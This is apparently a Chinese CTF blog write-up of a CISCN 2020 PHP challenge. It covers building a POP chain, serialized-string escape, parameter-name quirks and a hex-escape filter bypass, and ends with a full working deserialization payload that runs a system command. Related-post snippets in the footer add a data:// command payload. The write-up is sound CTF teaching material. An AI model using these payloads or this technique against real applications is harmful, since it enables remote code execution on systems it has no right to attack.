CISCN2020_You_don‘t_know_PHP

最新推荐文章于 2024-04-19 11:31:43 发布
最新推荐文章于 2024-04-19 11:31:43 发布
阅读量282 收藏 1
点赞数
分类专栏: CTF 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45551083/article/details/111084908
版权
本文介绍了2020年CISCN比赛中一道关于PHP安全的题目,涉及POP链构造、反序列化数据构造以及PHP的小特性。通过构造特定的PHP对象,利用POP链和反序列化字符逃逸来绕过安全检查,同时讨论了如何计算字符长度和插入payload的方法。
摘要由CSDN通过智能技术生成

前言

2020CISCN的一道web题, 题目名字叫啥记不清了,随便取了一个

环境: PHP 7.3+
题目源码:

链接:https://pan.baidu.com/s/11yuM9heXCwwGDLOjUP1Y-A
提取码:lmar

题目考察: POP链构造,反序列化逃逸,PHP小特性

POP链构造

主要就下面这几个class,先把链子造出来

class level1{
    protected $username;

    public function __construct($username = 'Guest'){
        $this->username = $username;
    }

    public function check_type(){
        if (gettype($this->username) === "function" or gettype($this->username) === "object"){
            $username = $this->username;
            $username();
        }
    }

    public function __destruct(){
        $this->check_type();
    }

}

class level2{
    protected $username;

    public function __construct($username){
        $this->username = $username;
    }

    public function __wakeup(){
        if ($this->username !== 'admin'){
            $this->username = 'Guest';
            echo "you are really dance\n";
        }
    }
    

    public function __invoke(){
        $this->check_name();
    }

    public function check_name(){
        if (stristr($this->username, 'admin')){
            echo "you are 666\n";
        }
        else{
            echo "Must Be admin!\n";
        }
    }
}

class level3{
    protected $username = "";

    public function __construct($username = "Guest"){
        $this->username = $username;
    }

    public function get_flag(){
	system("cat /flag.txt");
        echo "you_get_my_flag!!!";
    }

    public function __toString(){
        $this->get_flag();
        return "";  
    }

}

level1::__destruct()=>level1::check_type()=>level2::__invoke()=>level2::check_name()=>level3::__toString()=>level3::get_flag()

构造:

class level3{
    public $username = "lonmar";
}
class level2{
    public $username;
}
class level1{
    public $username;
}
$a = new level3();
$b = new level2($a);
$b->username = $a;
$c = new level1();
$c->username = $b;
var_dump(serialize($c));
//O:6:"level1":1:{s:8:"username";O:6:"level2":1:{s:8:"username";O:6:"level3":1:{s:8:"username";s:6:"lonmar";}}}

但是还需要绕过level1::__wakeup(),可以参考下 https://www.cnblogs.com/CubicZ/p/11938419.html
O:6:"level1":1:{s:8:"username";O:6:"level2":2:{s:8:"username";O:6:"level3":1:{s:8:"username";s:6:"lonmar";}}}

本地测试没问题
在这里插入图片描述

构造反序列化数据

这里可控点只有$your_name.able$your_pass.able

在这里插入图片描述
PHP小特性:
PHP变量名应该只有数字字母下划线,同时GET或POST方式传进去的变量名,会自动将空格+ . [转换为_
但是有一个特性可以绕过,使变量名出现.之类的
特殊字符[, GET或POST方式传参时,变量名中的[也会被替换为_,但其后的字符就不会被替换了
CTF[SHOW.COM=>CTF_SHOW.COM
在这里插入图片描述
在这里插入图片描述

可以利用这个特性传参,但显然仅靠这两个是没办法传入POP链的.

common.php里还有这两个函数,put让字符边长,get让字符变短.

在这里插入图片描述
guest.php里面进行反序列化操作用到了get(),put在接收参数的时候使用

在这里插入图片描述
所以考虑利用反序列化字符逃逸

反序列化字符逃逸原理可以参考 : https://blog.csdn.net/weixin_45551083/article/details/111085944

显然是利用让字符变短吞掉后面的字符的情况

首先正常传参数后,反序列化数据应该是

someone":3:{s:12:"*your_name";s:6:"lonmar";s:12:"*your_pass";s:4:"pass";s:8:"*admin";i:0;}

但是还需要插入 O:6:"level1":1:{s:8:"username";O:6:"level2":2:{s:8:"username";O:6:"level3":1:{s:8:"username";s:6:"lonmar";}}} 有109个字符

可以构造 your_name.able=lonmar your_pass.able=password";O:6:"level1":1:{s:8:"username";O:6:"level2":2:{s:8:"username";O:6:"level3":1:{s:8:"username";s:6:"lonmar";}}}

这里your_pass.able构造有错误不过不影响后面分析如果构造your_name.pass,your_pass.able后面重新构造

这样构造出来的反序列化数据为

O:7:"someone":3:{s:12:"*your_name";s:6:"lonmar";s:12:"*your_pass";s:119:"password";O:6:"level1":1:{s:8:"username";O:6:"level2":2:{s:8:"username";O:6:"level3":1:{s:8:"username";s:6:"lonmar";}}}";s:8:"*admin";i:0;}

利用字符变短往后吞字符,则需要多吞掉

";s:12:" * your_pass";s:119:"password 一共37个字符
在这里插入图片描述

get会将uuuuuu六个字符变成三个字符,吞掉三个字符,37不能被3整除,重新构造
your_pass.able=password12";O:6:"level1":1:{s:8:"username";O:6:"level2":2:{s:8:"username";O:6:"level3":1:{s:8:"username";s:6:"lonmar";}}}
这样需要吞掉的就是 ";s:12:" * your_pass";s:119:"password1 39个字符

只需要13个uuuuuu

在这里插入图片描述

构造
your_name.able=uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuulonmar

然后这里构造your_pass.able有个坑就是,对象的反序列化数据里面,一定要有key,所以上面构造的有问题,正确的构造:
your_pass.able=password11";s:12:"uuuuuuyour_pass";O:6:"level1":1:{s:8:"username";O:6:"level2":2:{s:8:"username";O:6:"level3":1:{s:8:"username";s:6:"lonmar";}}};s:8:"uuuuuuadmin";i:0;}
为链子加上了key, s:12:"uuuuuuyour_pass"
和后面的;s:8:"uuuuuuadmin";i:0;}既构成闭合(;}),又使总体成员个数不变

然后本地调试一下,思路正确

在这里插入图片描述
最后一步,绕过check

有一个check函数

在这里插入图片描述
绕过方法是把属性名小写s改成S,并用16进制绕过,原理暂时不清楚(不清楚官方手册有没有),应该是s \00就代表三个字符,S \00就代表一个字符的十六进制(@会下雪的晴天)
payload:

?your[name.able=uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuulonmar&your[pass.able=password11";s:12:"uuuuuuyour_pass";O:6:"level1":1:{S:8:"user\6eame";O:6:"level2":2:{S:8:"user\6eame";O:6:"level3":1:{S:8:"user\6eame";s:6:"lonmar";}}};s:8:"uuuuuuadmin";i:0;}

在这里插入图片描述
在这里插入图片描述

总结

关键还是计算吞掉的字符长度和弄清楚payload怎么插进去

参考: https://blog.csdn.net/mochu7777777/article/details/108220249

lonmar~
关注
专栏目录
level2 [XCTF-PWN]CTF writeup系列6
重新启程
12-19 615
题目地址:level2 先看看题目内容: 照例下载文件,检查一下保护机制 root@mypwn:/ctf/work/python# checksec 15bc0349874045ba84bb6e504e910a46 [*] '/ctf/work/python/15bc0349874045ba84bb6e504e910a46' Arch: i386-32-little ...
[CISCN2020]-easyphp
Keepb1ue的博客
08-21 6595
源码: <?php //题目环境:php:7.4.8-apache $pid = pcntl_fork(); if ($pid == -1) { die('could not fork'); }else if ($pid){ $r=pcntl_wait($status); if(!pcntl_wifexited($status)){ phpinfo(); } }else{
Uboot_1.1.6ReadMe翻译
u012417290的博客
10-28 5244
转自博客:http://blog.mcuol.com/okti/index.htm 前面是Uboot的发展,下载地址,如何获得帮助,以及版本说明 Directory Hierarchy: 目录层次 ==================== - board Board dependent files 开发板相关文件 - common Misc architecture
添加打印机端口监视器错误_引入Bugsnag-您需要的最后一个错误监视器
culh2177的博客
08-28 2158
添加打印机端口监视器错误The pursuit of building an error-free application continues. But in the meanwhile, we need to monitor our application’s errors and take action quickly. Many companies have tried to solve t...
移动终端安全 顶级会议_顶级移动应用开发公司
热门推荐
cullen2012的博客
09-09 104万+
移动终端安全 顶级会议 1. BelITSoft(美国白俄罗斯) (1. BelITSoft (Belarus, USA)) Belitsoft is located in Eastern Europe, Belarus (Minsk), USA and UK. The company was founded in 2004 and became a resident of Belarus H...
tcpdump高级过滤表达式
miaomiaodmiaomiao的专栏
04-05 928
http://www.wains.be/pub/networking/tcpdump_advanced_filters.txt   tcpdump advanced filters ======================== Sebastien Wains http://www.wains.be $Id: tcpdump_advanced_filters.txt
SecureCRT也能和Xshell一样批量导入主机
angou6476的博客
05-12 681
在Xshell可以像这样一个文件批量导入主机: https://blog.netsarang.com/91/importing-csv-formatted-host-information-to-xshell/ 在CRT上也可以,格式和Xshell的一样,但前提是需要运行一个自定义脚本: 脚本:https://forums.vandyke.com/showthread.php?p=...
爬虫学习笔记(十)数据存储——xml、json、csv 2020.5.9
闵行小鱼塘
05-09 1418
本节学习数据存储的xml、json、csv
www.fireandstrings.com/wholesalejerseys.php
ciyou9641的博客
07-06 234
Jersey shore on digg Mens dresses From"Hat Shore" wholesale nfl jerseys from china MTV's "Shirt Shore" Is stuff...
Know Your Enemy
Tobylili的小窝
03-13 7996
我的长官经常对我说:在敌人面前好很好的保护自己,你必须先了解敌人先。(孙子兵法:知己知彼,百战百胜)。这句军事用语现在也很好的应用于网络安全领域中了,就象作战一样,你要保护自己的资源,你需要知道谁是你最大的威胁和他们会怎样攻击。在这个系列中的第一篇文章,就是讨论一种很流行很广泛的来自Script Kiddie所使用的工具和方法,如果你或者你的组织有任何资源连接到Internet上,你就有此类的威胁
FreeRADIUS 和 Daloradius搭建radius认证服务器并实现Web管理
最新发布
weixin_44517454的博客
04-19 2739
网上搜索和很多FreeRADIUS + Daloradiu实现Web管理的搭建案例,自己按照案例尝试搭建都没有成功,自己发现并解决了问题,因此将成功搭建的经验写下来帮助那些想要搭建的IT同行们。
CCIE重认证350-401
stqer的博客
01-04 2226
traffic policing: causes TCP retransmissions when traffic is dropped导致TCP重传时流量下降 introduces no delay and jitter引入无延迟和抖动 drops excessive traffic减少过多的流量 traffic shaping: buffers excessive traffic缓冲过多的流量 introduces delay and jitter引入延迟和抖动 applied on traffic t
[转]高负载并发网站架构分析
bluehire的专栏
12-23 2万+
由于自己正在做一个高性能大用户量的论坛程序,对高性能高并发服务器架构比较感兴趣,于是在网上收集了不少这方面的资料和大家分享。希望能和大家交流 msn: defender_ios@hotmail.com ——————————————————————————————————————— ? 初创网站与开源软件 6 ? 谈谈大型高负载网站服务器的优化心得! 8 ? Lighttpd+Squid+Apach
CTFShow web151-170 (文件上传)
lonmar的博客
12-02 5685
web151 前端检测类型,burp抓包修改文件名称即可 文件上传思路,先上传一张图片马,再慢慢测试过滤规则(文件名,之类的) web152 思路和前面的一致 web153 上传.user.ini配置文件 原理:https://www.dazhuanlan.com/2020/03/08/5e641cbc397c2/ 防挂 https://www.cnblogs.com/l0nmar/p/14053889.html 发现很容易上传如php5,phtml等类型文件,但是不解析.通过插件识别为ngin
CTFShow web入门123-150 (php特性(二))
lonmar的博客
12-05 5590
CTFSHOW PHP特性篇 web123-150
CTFShow文件包含(web78-88)
lonmar的博客
11-28 3056
web78 php://input + POSTdata命令执行 ?file=php://filter/convert.base64-encode/resource=flag.php web79 大小写绕过str_replace str_replace() 函数替换字符串中的一些字符(区分大小写)。 2. data:// ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web80 大小写
CTFShow-PHP特性篇(一) (web89-web115)
lonmar的博客
12-03 2054
文章目录web89web90web91web92web93web94web95web96web97web98web99web100web 101 web89 数组绕过 原理: 且 preg_math()传入数组参数也会直接返回0 web90 ?num=0x117c 0x117c会转为4476 还是考察intval()函数 intval( mixed $var[, int $base = 10] ) : int var 要转换成 integer 的数量值 base 转化所使用的进制 Note: 如果
SQLiLab刷题记录
lonmar的博客
12-09 1963
sqli lab 通关手册
ctfshow web入门 web57
lonmar的博客
11-24 1142
文章目录0x010x020x03 看wp分析一波 只要凑出36即可 0x01 shell中各种括号()、(())、[]、[[]]、{}的作用和区别 : https://blog.csdn.net/qq_46091464/article/details/108563368 ${_}:代表上一次命令执行的结果 $(()): 做运算 0x02 之前没有命令返回或者执行,结果应该是空,与""等价 又 $((""))值为0,$((~$((""))))值为-1,再做拼接: 所以可以拼接得到-37 , -37
CISCO_3550交换机中文配置与维护指南
"CISCO_3550交换机中文配置手册是一份针对35XX系列交换机的简明配置维护指南,由中望商业机器公司于2002年12月10日发布,并在IT猫扑社区分享。手册涵盖了基本的配置操作,如端口设置、VLAN配置、安全特性以及三层...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值